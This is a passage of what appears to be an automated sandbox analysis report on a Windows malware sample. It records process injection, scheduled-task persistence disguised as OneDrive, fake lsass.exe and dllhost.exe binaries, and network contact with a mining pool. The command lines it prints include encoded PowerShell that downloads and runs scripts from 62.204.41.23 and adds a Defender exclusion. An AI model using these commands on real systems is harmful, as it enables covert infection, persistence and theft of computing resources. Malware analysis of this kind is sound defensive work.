Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3100 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3100 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3100 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3100 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3100 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3100 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3100 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3100 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4228 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4228 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4228 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4228 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4228 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4228 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4228 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4228 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4776 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4776 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4776 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4776 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4776 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4776 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4776 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4776 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3096 wrote to memory of 1960 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 3096 wrote to memory of 1960 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 3284 wrote to memory of 2256 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3284 wrote to memory of 2256 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3284 wrote to memory of 216 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3284 wrote to memory of 216 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3284 wrote to memory of 4516 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3284 wrote to memory of 4516 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3284 wrote to memory of 4560 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3284 wrote to memory of 4560 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3096 wrote to memory of 3060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 3096 wrote to memory of 3060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 3096 wrote to memory of 3060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 3096 wrote to memory of 4744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 3096 wrote to memory of 4744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 3096 wrote to memory of 4744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 2864 wrote to memory of 4828 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2864 wrote to memory of 4828 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2864 wrote to memory of 1832 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2864 wrote to memory of 1832 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2864 wrote to memory of 636 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2864 wrote to memory of 636 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2864 wrote to memory of 1052 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2864 wrote to memory of 1052 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3084 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 3084 wrote to memory of 340 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 4744 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 4744 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 4744 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 4744 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 4744 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 4744 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 4744 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 4744 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 4744 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4640 wrote to memory of 444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4640 wrote to memory of 444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe

"C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 07:16 /du 23:59 /sc daily /ri 1 /f

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD7D.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 23.41.204.62.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
N/A 185.161.248.16:26885 tcp
US 8.8.8.8:53 16.248.161.185.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
RU 62.204.41.23:80 tcp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 pool.hashvault.pro udp
US 142.202.242.45:80 pool.hashvault.pro tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 45.242.202.142.in-addr.arpa udp
US 52.152.110.14:443 tcp
IE 20.50.73.9:443 tcp
US 52.152.110.14:443 tcp
US 8.8.8.8:53 203.151.224.20.in-addr.arpa udp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.248.3.254:80 tcp
US 8.248.3.254:80 tcp
US 52.152.110.14:443 tcp
US 52.152.110.14:443 tcp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
US 204.79.197.203:80 tcp
US 52.152.110.14:443 tcp
US 52.152.110.14:443 tcp

Files

memory/3100-133-0x0000000000860000-0x0000000000878000-memory.dmp

memory/4656-135-0x000001FA1E100000-0x000001FA1E122000-memory.dmp

memory/4656-136-0x000001FA1BF10000-0x000001FA1BF20000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k4hwzdpn.kxm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4656-137-0x000001FA1BF10000-0x000001FA1BF20000-memory.dmp

memory/4776-143-0x0000029C59970000-0x0000029C59980000-memory.dmp

memory/4228-159-0x0000017CED9F0000-0x0000017CEDA00000-memory.dmp

memory/3096-168-0x000001CD9C460000-0x000001CD9C470000-memory.dmp

memory/4776-153-0x0000029C59970000-0x0000029C59980000-memory.dmp

memory/3096-180-0x000001CD9C460000-0x000001CD9C470000-memory.dmp

memory/4776-181-0x0000029C59970000-0x0000029C59980000-memory.dmp

memory/4228-182-0x0000017CED9F0000-0x0000017CEDA00000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 026d93a446c50e4ae9aa47a15d0e923f
SHA1 f8832c1a57c63bc1b085b10f39b69254e27b2fb8
SHA256 c06620ef42e09394b9fb9816937e9161cdb5740ad2c1a312f55483cbc2adf089
SHA512 009c2cc902b3c560f77f882d4cd432e6893c51b8932889a4de8b119933e6bb6a9c91948dbb7ec392e120dfadca0211134625ffd6252b261fc84af8e17fbc2181

memory/3476-183-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/3476-187-0x00000000052D0000-0x0000000005336000-memory.dmp

memory/3476-188-0x00000000053E0000-0x000000000547C000-memory.dmp

memory/3476-189-0x0000000005340000-0x00000000053A6000-memory.dmp

memory/2032-190-0x0000000000400000-0x0000000000430000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 026d93a446c50e4ae9aa47a15d0e923f
SHA1 f8832c1a57c63bc1b085b10f39b69254e27b2fb8
SHA256 c06620ef42e09394b9fb9816937e9161cdb5740ad2c1a312f55483cbc2adf089
SHA512 009c2cc902b3c560f77f882d4cd432e6893c51b8932889a4de8b119933e6bb6a9c91948dbb7ec392e120dfadca0211134625ffd6252b261fc84af8e17fbc2181

memory/2032-193-0x000000000AB40000-0x000000000B158000-memory.dmp

memory/2032-194-0x000000000A6A0000-0x000000000A7AA000-memory.dmp

memory/2032-195-0x000000000A5D0000-0x000000000A5E2000-memory.dmp

memory/2032-196-0x000000000A630000-0x000000000A66C000-memory.dmp

memory/2032-197-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/3096-199-0x000001CD9C460000-0x000001CD9C470000-memory.dmp

memory/3096-201-0x000001CD9C460000-0x000001CD9C470000-memory.dmp

memory/2032-203-0x000000000A940000-0x000000000A9B6000-memory.dmp

memory/2032-204-0x000000000AA60000-0x000000000AAF2000-memory.dmp

memory/2032-205-0x000000000B710000-0x000000000BCB4000-memory.dmp

memory/2032-206-0x000000000B300000-0x000000000B350000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/2032-213-0x0000000005190000-0x00000000051A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

memory/3060-221-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2032-222-0x000000000BF90000-0x000000000C152000-memory.dmp

memory/2032-223-0x000000000C690000-0x000000000CBBC000-memory.dmp

memory/3060-225-0x00000000048E0000-0x00000000048E1000-memory.dmp

memory/3060-224-0x0000000004900000-0x0000000004901000-memory.dmp

memory/3060-226-0x00000000048F0000-0x00000000048F1000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1960-229-0x00007FF7E3BB0000-0x00007FF7E457A000-memory.dmp

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/4744-240-0x0000000000B60000-0x0000000000F80000-memory.dmp

memory/4744-243-0x0000000000B60000-0x0000000000F80000-memory.dmp

memory/4744-244-0x0000000000B60000-0x0000000000F80000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 59cf934cb9423ae365303b9b254219d2
SHA1 e67ada1d9c39fa2ce039f87afcf2107e0fc36aaa
SHA256 a0bb67b3d402445845eabf82e660aaf63dee4becf899d727eaedd6c4ab9a8004
SHA512 122e66c756f48622ca7ea3fc657f36731fbfc59d5e92ad1702ec26f4d30f426492e9b6caaaea3249b56e70a48ecc8b25d6c127cc176f25de25df4cb700ba6692

memory/3036-255-0x000002E3784A0000-0x000002E3784B0000-memory.dmp

memory/3036-256-0x000002E3784A0000-0x000002E3784B0000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/340-263-0x0000013338230000-0x0000013338250000-memory.dmp

memory/3084-262-0x00007FF750EC0000-0x00007FF75188A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f8d061cb5bbb2559aaf515aec28227a0
SHA1 24251cc79b5c4f61c8154be0a18c5127713c796f
SHA256 ce7532548c92e3d3da457e2e8fa83ad4077a52af322c2b8635ca19cbbdc38269
SHA512 a02b2b0f43fef99513543d3be68c2fcad0dd6e66aa6c63e58f9874a51c27f58cdac79c4d9059a92d6a3e5b5235c9ad294abd2716109335f917e7df092980bf8f

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
